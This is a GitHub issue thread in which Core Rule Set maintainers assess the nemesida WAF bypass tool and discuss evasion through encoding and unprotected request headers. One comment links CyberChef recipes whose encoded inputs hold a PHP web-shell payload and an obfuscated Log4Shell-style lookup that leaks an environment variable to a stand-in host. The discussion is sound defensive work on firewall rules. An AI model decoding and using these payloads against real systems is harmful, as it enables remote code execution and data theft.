### ISSUE TITLE
Investigate nemesida WAF Bypass tool

### ISSUE THREAD

**Issue by dune73** [coreruleset/coreruleset#3150]
I took a peek at https://github.com/nemesida-waf/waf-bypass

It runs a great many payloads against WAFs and reports bypasses and also a few FPs.

CRS does OK, but still quite a few bypasses, namely rules not applied to certain headers or base64 encoded payloads.

Worth taking a closer look. See dump of execution: [nemesida-waf-report.txt](https://github.com/coreruleset/coreruleset/files/10896199/nemesida-waf-report.txt)

**Comment by Xhoenix** [comment]
Sir, I checked this `waf-bypass` technique and found that only some of the payloads used has a chance of success in real world scenarios and most of the payloads use multiple level of encoding, for e.g, Base64 --> Unicode Escape --> URL Encoding --> Payload. You can check a CyberChef analysis of two such payloads [here](https://cyberchef.org/#recipe=URL_Decode()Unescape_Unicode_Characters('%5C%5Cu')&input=L2xvZ2luP3BhcmFtMmI5MjdiPSU1Q3UwMDY0JTVDdTAwNjElNUN1MDA3NCU1Q3UwMDYxJTVDdTAwM2ElNUN1MDAyZiU1Q3UwMDJmJTVDdTAwNzQlNUN1MDA2NSU1Q3UwMDc4JTVDdTAwNzQlNUN1MDAyZiU1Q3UwMDcwJTVDdTAwNmMlNUN1MDA2MSU1Q3UwMDY5JTVDdTAwNmUlNUN1MDAzYiU1Q3UwMDYyJTVDdTAwNjElNUN1MDA3MyU1Q3UwMDY1JTVDdTAwMzYlNUN1MDAzNCU1Q3UwMDJjJTVDdTAwNTAlNUN1MDA0NCU1Q3UwMDM5JTVDdTAwNzclNUN1MDA2MSU1Q3UwMDQ4JTVDdTAwNDElNUN1MDA2NyU1Q3UwMDYzJTVDdTAwMzMlNUN1MDA2YyU1Q3UwMDdhJTVDdTAwNjQlNUN1MDA0NyU1Q3UwMDU2JTVDdTAwNzQlNUN1MDA0YiU1Q3UwMDQzJTVDdTAwNTIlNUN1MDA2NiU1Q3UwMDUyJTVDdTAwMzAlNUN1MDA1NiU1Q3UwMDU1JTVDdTAwNTclNUN1MDA3OSU1Q3UwMDY0JTVDdTAwNmElNUN1MDA2MiU1Q3UwMDU3JTVDdTAwNTElNUN1MDA2ZSU1Q3UwMDU4JTVDdTAwNTMlNUN1MDA2YiU1Q3UwMDM3JTVDdTAwNWElNUN1MDA1NyU1Q3UwMDRlJTVDdTAwNmYlNUN1MDA2MiU1Q3UwMDc5JTVDdTAwNDElNUN1MDA2ZSU1Q3UwMDU1JTVDdTAwMzIlNUN1MDA2OCU1Q3UwMDZjJTVDdTAwNjIlNUN1MDA0NyU1Q3UwMDc3JTVDdTAwNjclNUN1MDA1YSU1Q3UwMDQ3JTVDdTAwMzklNUN1MDA3NSU1Q3UwMDVhJTVDdTAwNTMlNUN1MDA0MSU1Q3UwMDY4JTVDdTAwNGElNUN1MDA3YSU1Q3UwMDczJTVDdTAwNjclNUN1MDA1MCU1Q3UwMDdhJTVDdTAwMzQlNUN1MDAzZA) and [here](https://cyberchef.org/#recipe=URL_Decode()Unescape_Unicode_Characters('%5C%5Cu')URL_Decode()&input=L2xvZ2luPyU1Q3UwMDI1JTVDdTAwMzIlNUN1MDAzNCU1Q3UwMDI1JTVDdTAwMzUlNUN1MDA0MyU1Q3UwMDI1JTVDdTAwMzclNUN1MDA0MiU1Q3UwMDI1JTVDdTAwMzIlNUN1MDAzNCU1Q3UwMDI1JTVDdTAwMzUlNUN1MDA0MyU1Q3UwMDI1JTVDdTAwMzclNUN1MDA0MiU1Q3UwMDI1JTVDdTAwMzMlNUN1MDA0MSU1Q3UwMDI1JTVDdTAwMzMlNUN1MDA0MSU1Q3UwMDJkJTVDdTAwNmElNUN1MDAyNSU1Q3UwMDM1JTVDdTAwNDMlNUN1MDAyNSU1Q3UwMDM3JTVDdTAwNDQlNUN1MDAyNSU1Q3UwMDMyJTVDdTAwMzQlNUN1MDAyNSU1Q3UwMDM1JTVDdTAwNDMlNUN1MDAyNSU1Q3UwMDM3JTVDdTAwNDIlNUN1MDAyNSU1Q3UwMDMzJTVDdTAwNDElNUN1MDAyNSU1Q3UwMDMzJTVDdTAwNDElNUN1MDAyZCU1Q3UwMDZlJTVDdTAwMjUlNUN1MDAzNSU1Q3UwMDQzJTVDdTAwMjUlNUN1MDAzNyU1Q3UwMDQ0JTVDdTAwMjUlNUN1MDAzMiU1Q3UwMDM0JTVDdTAwMjUlNUN1MDAzNSU1Q3UwMDQzJTVDdTAwMjUlNUN1MDAzNyU1Q3UwMDQyJTVDdTAwMjUlNUN1MDAzMyU1Q3UwMDQxJTVDdTAwMjUlNUN1MDAzMyU1Q3UwMDQxJTVDdTAwMmQlNUN1MDA2NCU1Q3UwMDI1JTVDdTAwMzUlNUN1MDA0MyU1Q3UwMDI1JTVDdTAwMzclNUN1MDA0NCU1Q3UwMDI1JTVDdTAwMzIlNUN1MDAzNCU1Q3UwMDI1JTVDdTAwMzUlNUN1MDA0MyU1Q3UwMDI1JTVDdTAwMzclNUN1MDA0MiU1Q3UwMDI1JTVDdTAwMzMlNUN1MDA0MSU1Q3UwMDI1JTVDdTAwMzMlNUN1MDA0MSU1Q3UwMDJkJTVDdTAwNjklNUN1MDAyNSU1Q3UwMDM1JTVDdTAwNDMlNUN1MDAyNSU1Q3UwMDM3JTVDdTAwNDQlNUN1MDAyNSU1Q3UwMDMzJTVDdTAwNDElNUN1MDAyNSU1Q3UwMDMyJTVDdTAwMzQlNUN1MDAyNSU1Q3UwMDM1JTVDdTAwNDMlNUN1MDAyNSU1Q3UwMDM3JTVDdTAwNDIlNUN1MDAyNSU1Q3UwMDMzJTVDdTAwNDElNUN1MDAyNSU1Q3UwMDMzJTVDdTAwNDElNUN1MDAyZCU1Q3UwMDcyJTVDdTAwMjUlNUN1MDAzNSU1Q3UwMDQzJTVDdTAwMjUlNUN1MDAzNyU1Q3UwMDQ0JTVDdTAwMjUlNUN1MDAzMiU1Q3UwMDM0JTVDdTAwMjUlNUN1MDAzNSU1Q3UwMDQzJTVDdTAwMjUlNUN1MDAzNyU1Q3UwMDQyJTVDdTAwMjUlNUN1MDAzMyU1Q3UwMDQxJTVDdTAwMjUlNUN1MDAzMyU1Q3UwMDQxJTVDdTAwMmQlNUN1MDA2ZCU1Q3UwMDI1JTVDdTAwMzUlNUN1MDA0MyU1Q3UwMDI1JTVDdTAwMzclNUN1MDA0NCU1Q3UwMDI1JTVDdTAwMzIlNUN1MDAzNCU1Q3UwMDI1JTVDdTAwMzUlNUN1MDA0MyU1Q3UwMDI1JTVDdTAwMzclNUN1MDA0MiU1Q3UwMDI1JTVDdTAwMzMlNUN1MDA0MSU1Q3UwMDI1JTVDdTAwMzMlNUN1MDA0MSU1Q3UwMDJkJTVDdTAwNjklNUN1MDAyNSU1Q3UwMDM1JTVDdTAwNDMlNUN1MDAyNSU1Q3UwMDM3JTVDdTAwNDQlNUN1MDAyNSU1Q3UwMDMzJTVDdTAwNDElNUN1MDAyNSU1Q3UwMDMyJTVDdTAwNDYlNUN1MDAyNSU1Q3UwMDMyJTVDdTAwNDYlNUN1MDAyNSU1Q3UwMDMyJTVDdTAwMzQlNUN1MDAyNSU1Q3UwMDM1JTVDdTAwNDMlNUN1MDAyNSU1Q3UwMDM3JTVDdTAwNDIlNUN1MDA2NSU1Q3UwMDZlJTVDdTAwNzYlNUN1MDAyNSU1Q3UwMDMzJTVDdTAwNDElNUN1MDA1NSU1Q3UwMDUzJTVDdTAwNDUlNUN1MDA1MiU1Q3UwMDI1JTVDdTAwMzUlNUN1MDA0MyU1Q3UwMDI1JTVDdTAwMzclNUN1MDA0NCU1Q3UwMDJlJTVDdTAwNjUlNUN1MDA3OCU1Q3UwMDYxJTVDdTAwNmQlNUN1MDA3MCU1Q3UwMDZjJTVDdTAwNjUlNUN1MDAyZSU1Q3UwMDYzJTVDdTAwNmYlNUN1MDA2ZA). 


I also found that most of the bypass techniques used **"Unicode Escape encoding evasion"**. My suggestion would be to implementing some sort of an Unicode _Unescape_ mechanism for the ascii character set, to prevent such evasion. I checked the CRS code and found that some regression tests were developed for **Log4J** to check Unicode Escape evasion, but I'm not quite sure if there is already such a mechanism in place. Also, I'm still learning new things about CRS and I think other CRS members may be able to provide a better solutions for this.

**Comment by dune73** [comment]
I saw the base64 tricks that call for the audo-decode-plugin to be fought.

You mean some transformation beyond the `t:urlDecodeUni`?

@theMiddleBlue you worked on the Log4J stuff as well, did not you? What is your take on this?

**Comment by fzipi** [comment]
@Xhoenix Do you want to take a second look at this one?

**Comment by Xhoenix** [comment]
I'll try to, still I don't expect any new results from what I mentioned.

**Comment by Xhoenix** [comment]
I rechecked and some of the payloads reported as **BYPASSED** are actually getting blocked by CRS. Also, most of the payloads use fields like Referer header, User-Agent header, Request body etc. which are currently not covered by CRS. So, we need to extend most rules to include request headers.

**Comment by EsadCetiner** [comment]
I've taken a look at this as well, and I've came to a similar conclusion that @Xhoenix has. We're doing slightly better now at PL-4 then when @dune73 ran this.

Most false negatives specifically happen within `REQUEST_HEADERS`, especially if they using some kind of encoding for evasion. This should be handled by the Auto-decoding plugin, but right now it only decodes `ARGS` and not `REQUEST_HEADERS`, and most CRS rules only target the `referer` and `user-agent` headers.

I also noticed that all requests are sent malformed, none of them seem to contain a Content Type header so I'd take the results here with a grain of salt.

[nemesida-waf-report-1.txt](https://github.com/user-attachments/files/24574448/nemesida-waf-report-1.txt)
[nemesida-waf-report-2.txt](https://github.com/user-attachments/files/24574449/nemesida-waf-report-2.txt)

I'll close this issue and open another issue in favor of having an discussion on how to approach request headers.
